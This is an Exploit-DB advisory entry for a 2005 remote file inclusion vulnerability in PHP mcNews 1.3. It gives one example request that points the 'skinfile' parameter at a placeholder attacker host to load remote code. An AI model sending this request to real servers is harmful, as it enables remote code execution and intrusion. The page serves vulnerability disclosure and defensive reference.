PHP mcNews 1.3 - 'skinfile' Remote File Inclusion

EDB-ID:

865

CVE:

14601 2005-0720

EDB Verified:

Author:

Filip Groszynski

Type:

webapps

Paper: /

Platform:

PHP

Published:

2005-03-07

Vulnerable App:

Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/

# milw0rm.com [2005-03-07]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services